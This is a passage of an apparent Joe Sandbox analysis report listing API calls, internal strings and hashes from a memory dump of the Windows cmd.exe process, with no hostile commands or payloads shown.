                                                                                        • Opcode ID: bb68e5229f3a61b7ed3c0e4f972b5d9a4aa66093764e8200e12a59978c334cbf
                                                                                        • Instruction ID: 537eaa3825b2bd37217b6552ad6828823cc16c2da722080a04bbd3167a148664
                                                                                        • Opcode Fuzzy Hash: bb68e5229f3a61b7ed3c0e4f972b5d9a4aa66093764e8200e12a59978c334cbf
                                                                                        • Instruction Fuzzy Hash: 2571A871600305BFEB11AB749C46A7F7BA9EF09344B18852AF50AE22A1FB35CC41CB75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$iswspace
                                                                                        • String ID: =,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                        • API String ID: 759518647-875390083
                                                                                        • Opcode ID: a199245dcd1f82f081f3833859370d795bddff708126b1149717e6f136b2505e
                                                                                        • Instruction ID: c937ea721e5968ef8f4ae6a77af3e19e7e7aa3df1c9657bbd4071f8bd2befaeb
                                                                                        • Opcode Fuzzy Hash: a199245dcd1f82f081f3833859370d795bddff708126b1149717e6f136b2505e
                                                                                        • Instruction Fuzzy Hash: 36A1F6347443428BDB34AB79AC1A73A3364EF81714F18842EF58A866D0EBF5D841D736
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: iswdigit$iswspacewcschr$_setjmp3
                                                                                        • String ID: ()|&=,;"$=,;$@$Ungetting: '%s'
                                                                                        • API String ID: 684130364-3872429996
                                                                                        • Opcode ID: bfaafb8fff07e5e6002460f9e5ec0e26ce5f6a8793b440bd59c7b85696d71e09
                                                                                        • Instruction ID: d71f5adbe8ae889dc9e4fe6630bb71b4cc443bbada71a524551e92ce77d791b4
                                                                                        • Opcode Fuzzy Hash: bfaafb8fff07e5e6002460f9e5ec0e26ce5f6a8793b440bd59c7b85696d71e09
                                                                                        • Instruction Fuzzy Hash: ECE1DDB1F013119BCB209F69F98937A77A2EF16344F284026E885D7391E339CD4587BA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                        • _wcsicmp.MSVCRT ref: 00D6EC77
                                                                                        • _wcsicmp.MSVCRT ref: 00D6EC8D
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECA3
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECB9
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECCF
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECE5
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ECF7
                                                                                        • _wcsicmp.MSVCRT ref: 00D6ED0D
                                                                                          • Part of subcall function 00D69310: GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00D8E590,?,00002000), ref: 00D69342
                                                                                          • Part of subcall function 00D69310: SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D69356
                                                                                          • Part of subcall function 00D69310: FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 00D6936A
                                                                                          • Part of subcall function 00D69310: FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 00D6937E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$Time$File$System$EnvironmentLocalVariable
                                                                                        • String ID: CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                        • API String ID: 2447294730-2301591722
                                                                                        • Opcode ID: e391d446db0bf7bc80f56537b9ef8cbcd469ff0bb77d38608967195963893086
                                                                                        • Instruction ID: 4250191c739897480f439146cdb40dff1991a25dd2ae690fa101aec31adcf544
                                                                                        • Opcode Fuzzy Hash: e391d446db0bf7bc80f56537b9ef8cbcd469ff0bb77d38608967195963893086
                                                                                        • Instruction Fuzzy Hash: CF31E736208702AFE7185725AC1EA7B3B9DEB8B325B18451DF506D01D0FFA4D411CA7A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _wcsupr.MSVCRT ref: 00D89CC8
                                                                                        • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?), ref: 00D89D22
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00D89D2A
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D3A
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D50
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D89D58
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D68
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00D89D7C
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 00D89DDB
                                                                                        • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00D89DE2
                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 00D89DF2
                                                                                        • towupper.MSVCRT ref: 00D89E13
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        • wcschr.MSVCRT ref: 00D89E6A
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D89E9B
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00D89EA9
                                                                                          • Part of subcall function 00D6DD98: _get_osfhandle.MSVCRT ref: 00D6DDA3
                                                                                          • Part of subcall function 00D6DD98: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D7C050), ref: 00D6DDAD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
                                                                                        • String ID: <noalias>$CMD.EXE
                                                                                        • API String ID: 2015057810-1690691951
                                                                                        • Opcode ID: b5190520e566cde000b02238943d40a364fb6b9066c3b5a41b3f4c33cb347636
                                                                                        • Instruction ID: 035d981029111f470c55486899cb0179d4ce3e29e7b05d68dc27e0bccbbfda48
                                                                                        • Opcode Fuzzy Hash: b5190520e566cde000b02238943d40a364fb6b9066c3b5a41b3f4c33cb347636
                                                                                        • Instruction Fuzzy Hash: CB81F472A00214ABCF15ABB8DC54AFEBBB9EF49710F1C0119F842E7290EB719801C775
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D69A11: _get_osfhandle.MSVCRT ref: 00D69A1C
                                                                                          • Part of subcall function 00D69A11: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00D6793A,00000104,?), ref: 00D69A2B
                                                                                          • Part of subcall function 00D69A11: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A47
                                                                                          • Part of subcall function 00D69A11: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,00000002,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A56
                                                                                          • Part of subcall function 00D69A11: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374), ref: 00D69A61
                                                                                          • Part of subcall function 00D69A11: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00DA8E04,?,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D69A6A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D67943
                                                                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D67908,00002374,-00000001), ref: 00D67951
                                                                                        • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,00DA0AF0,000000A0,00000000,00000000,00000000,?,00000104,?), ref: 00D679BE
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,?,00000104,?), ref: 00D67A1C
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D67A27
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Console$ErrorLastLockShared_get_osfhandle$AcquireBufferFileHandleInfoModeReleaseScreenTypeWrite
                                                                                        • String ID:
                                                                                        • API String ID: 2173784998-0
                                                                                        • Opcode ID: c88650f132d25626c0c660ef99f3acc5fdc85d1daf6de55c07332e594fd74a90
                                                                                        • Instruction ID: e50b3ba87948b8f7af282f872e1afd906a217d914933788e7f5ae0282cb82bc6
                                                                                        • Opcode Fuzzy Hash: c88650f132d25626c0c660ef99f3acc5fdc85d1daf6de55c07332e594fd74a90
                                                                                        • Instruction Fuzzy Hash: 1C718E71D00218AFCB15DFA9DC88ABEBBB9FF49301F15452AF906E6254EB348944CB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,?), ref: 00D82931
                                                                                        • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00D82998
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentFormatMessageThread
                                                                                        • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                        • API String ID: 2411632146-3173542853
                                                                                        • Opcode ID: 61ab78a1a2a44f859db3621408a304520dd8e45f0492a1d7c8c4d8110b43db52
                                                                                        • Instruction ID: fa08c26725be72ce1a47b87d902c557585372dd1a698d2b05cfd2922a3f0f143
                                                                                        • Opcode Fuzzy Hash: 61ab78a1a2a44f859db3621408a304520dd8e45f0492a1d7c8c4d8110b43db52
                                                                                        • Instruction Fuzzy Hash: 2D51E2B1940304ABDB347F698C4AE3BB7B8EF55B00F08455DF54A92252EA71EA94CF31
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00D7B7DB,0000000C,00000004,00000080,00000000), ref: 00D705FF
                                                                                        • _open_osfhandle.MSVCRT ref: 00D70613
                                                                                        • _wcsicmp.MSVCRT ref: 00D70663
                                                                                        • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00D70695
                                                                                        • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 00D706D3
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D706FB
                                                                                        • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00D70717
                                                                                        • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 00D7E89D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                        • String ID: con
                                                                                        • API String ID: 58404892-4257191772
                                                                                        • Opcode ID: 8f2fb33a0d29c7a2ea3680e5aa7170f34bf1ea56cf1edf8d1094e0814d94b949
                                                                                        • Instruction ID: 9efdc73c26367998a68180fe8f371e271964cf3e231f57f91892c2e58bd67607
                                                                                        • Opcode Fuzzy Hash: 8f2fb33a0d29c7a2ea3680e5aa7170f34bf1ea56cf1edf8d1094e0814d94b949
                                                                                        • Instruction Fuzzy Hash: D751EB70A00204EFDB109B98DC49BBE7BB8EB85720F54831AF519E62D0E775C911CB76
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D7011A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetModuleFileNameW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,?,?,-00000001,?,?,00000000), ref: 00D70156
                                                                                          • Part of subcall function 00D6EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00D8E590,00002000,?,00DA8BF0,00000000,?,?,00D68F0D), ref: 00D6EC51
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6EC77
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6EC8D
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECA3
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECB9
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECCF
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECE5
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ECF7
                                                                                          • Part of subcall function 00D6EC2E: _wcsicmp.MSVCRT ref: 00D6ED0D
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D701DB
                                                                                        • exit.MSVCRT ref: 00D7E621
                                                                                        • _wcsupr.MSVCRT ref: 00D7E683
                                                                                        • _wcsicmp.MSVCRT ref: 00D7E71A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp$memset$EnvironmentFileModuleNameVariable_wcsuprexit
                                                                                        • String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
                                                                                        • API String ID: 2336066422-4197029667
                                                                                        • Opcode ID: 32daf35868924326412a09fbf1aa2dc2361e707aa8615f61f62961283e63c624
                                                                                        • Instruction ID: 10cbccbf5de587007be5672110d61bc4b6b8e15fa514615610b5c5db8b3232e7
                                                                                        • Opcode Fuzzy Hash: 32daf35868924326412a09fbf1aa2dc2361e707aa8615f61f62961283e63c624
                                                                                        • Instruction Fuzzy Hash: 9D51B234B003168BDF18DB64CC556BE7765EF64304F5989A9A80AE7280FF70DE41CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00D75A2E: memset.MSVCRT ref: 00D75A5A
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000,?,00000104,?), ref: 00D68C7A
                                                                                        • towupper.MSVCRT ref: 00D68C8F
                                                                                        • iswalpha.MSVCRT ref: 00D68CA4
                                                                                        • towupper.MSVCRT ref: 00D68CC4
                                                                                        • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?), ref: 00D68CF0
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D68D93
                                                                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00D68DE0
                                                                                        • SetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?), ref: 00D68E11
                                                                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00D7B6AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: AttributesCurrentDirectoryFilememsettowupper$ErrorFullLastNamePathiswalpha
                                                                                        • String ID:
                                                                                        • API String ID: 1133067188-0
                                                                                        • Opcode ID: 279740eb2bd44290527da8e5f7cfdb4ea1eacbd598c2266da174159d72b8bb9f
                                                                                        • Instruction ID: 5f38d4cc6803956e3cde7a869690b52d3ae202bf516aeec72685332ed40aac22
                                                                                        • Opcode Fuzzy Hash: 279740eb2bd44290527da8e5f7cfdb4ea1eacbd598c2266da174159d72b8bb9f
                                                                                        • Instruction Fuzzy Hash: B0B1AA30A002158BDB28EB64CD45BBDB374EF54320F58866AE55AE7290FB70DE84DB71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • memset.MSVCRT ref: 00D8C62E
                                                                                        • memset.MSVCRT ref: 00D8C656
                                                                                          • Part of subcall function 00D6E3F0: memset.MSVCRT ref: 00D6E455
                                                                                        • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 00D8C6C7
                                                                                        • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 00D8C6E6
                                                                                        • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 00D8C72A
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C747
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C76C
                                                                                        • _wcsicmp.MSVCRT ref: 00D8C794
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8C7B3
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D8C7C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                        • String ID: CSVFS$NTFS$REFS
                                                                                        • API String ID: 3510147486-2605508654
                                                                                        • Opcode ID: 669be5de1c7f900845c87c33262a43a401d13bad82b7ad127ad43270eff829a8
                                                                                        • Instruction ID: 60a7d5aec29578f5a65f40d685216b22697b647dfc2ca895e1d49e765fc32732
                                                                                        • Opcode Fuzzy Hash: 669be5de1c7f900845c87c33262a43a401d13bad82b7ad127ad43270eff829a8
                                                                                        • Instruction Fuzzy Hash: 385153B1A10219ABDB20DB65DC89EAFBBB8EF45344F0810A9E509D3140E774DE84CF75
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcsicmp
                                                                                        • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                        • API String ID: 2081463915-3124875276
                                                                                        • Opcode ID: 05b45b82da5f89204775736897681a5c279ab44287cf61ecc439f1f7bdefd4ab
                                                                                        • Instruction ID: 05ee6babdb2661eca39c2ec1416de2472edfeba18d7eb65f26274160494a3654
                                                                                        • Opcode Fuzzy Hash: 05b45b82da5f89204775736897681a5c279ab44287cf61ecc439f1f7bdefd4ab
                                                                                        • Instruction Fuzzy Hash: 98412A31204702DBD7246B64E87977AB7A8EB93724B68052FE042D72D0EBF6C844C732
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E318
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E322
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E32F
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E339
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E35E
                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E368
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E390
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E39A
                                                                                        • _get_osfhandle.MSVCRT ref: 00D6E3C7
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D6E3D1
                                                                                        • _get_osfhandle.MSVCRT ref: 00D7DC35
                                                                                        • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000), ref: 00D7DC3F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ConsoleMode_get_osfhandle
                                                                                        • String ID: CMD.EXE
                                                                                        • API String ID: 1606018815-3025314500
                                                                                        • Opcode ID: c8a111ebb1f63f8ea9f1a3f1ad8ebc94e99b92be348ff9807e1c53e07f547a24
                                                                                        • Instruction ID: 67896a228f0c8878388054d1f1367b54d4a2c849ac5f17b96bd6538bda953585
                                                                                        • Opcode Fuzzy Hash: c8a111ebb1f63f8ea9f1a3f1ad8ebc94e99b92be348ff9807e1c53e07f547a24
                                                                                        • Instruction Fuzzy Hash: 55215EB0A00300AFD7145B78EC1EB663728AB05756B098629F506D73E5D7B5D818CB77
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • longjmp.MSVCRT(00DA0A70,000000FF,00000000,?,00000001,?,?,?,00D75833,?, /D /c",?,?,?,00000000,?), ref: 00D81271
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmp
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmp
